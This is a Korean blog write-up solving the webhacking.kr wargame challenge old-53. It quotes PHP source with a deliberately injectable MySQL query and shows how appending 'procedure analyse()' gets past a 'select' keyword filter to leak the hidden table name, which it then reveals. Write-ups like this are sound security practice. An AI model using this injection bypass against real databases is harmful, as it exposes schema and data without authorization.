728x90
<?php
include "../../config.php";
if($_GET['view_source']) view_source();
?>
<html>
<head>
<title>Challenge 53</title>
</head>
<body>
<?php
$db = dbconnect();
include "./tablename.php";
if($_GET['answer'] == $hidden_table) solve(53);
if(preg_match("/select|by/i",$_GET['val'])) exit("no hack");
$result = mysqli_fetch_array(mysqli_query($db,"select a from $hidden_table where a={$_GET['val']}"));
echo($result[0]);
?>
<hr><a href=./?view_source=1>view-source</a>
</body>
</html>
table 명을 알아내면 된다.
원래라면 union select를 사용해 informaiton_schema에서 알아냈겠지만 select가 우회되어 있으므로 다른 방법을 써야 한다.
요 위에 블로그를 참고했다. 다른 내용들도 참고될만하니 읽어보는게 좋을듯 하다.
테이블명, 칼럼명을 알아내야할땐
: select test1 from test where id='admin' and pw='1234' procedure analyse();
* limit 2,1 등과 함께 사용하여 필요한 컬럼 명을 한 줄로 뽑아낼 수 있음
따라서 , /?val=1 procedure analyse() 이렇게 하면은 컬럼명이 한줄로 쭉 나온다.
이때 table name은 chall53_755fdeb36d873dfdeb2b34487d50a805이다.
answer에 table name을 보내면 성공이다.
728x90
반응형
'Web Hacking > Webhacking.kr' 카테고리의 다른 글
Webhacking.kr old-52 풀이 (0) | 2024.02.04 |
---|---|
Webhacking.kr old-48 풀이 (0) | 2024.01.27 |
Webhacking.kr old-35 풀이 (0) | 2024.01.07 |
Webhacking.kr old-04 풀이 (0) | 2024.01.07 |
Webhacking.kr old-05 풀이 (0) | 2024.01.06 |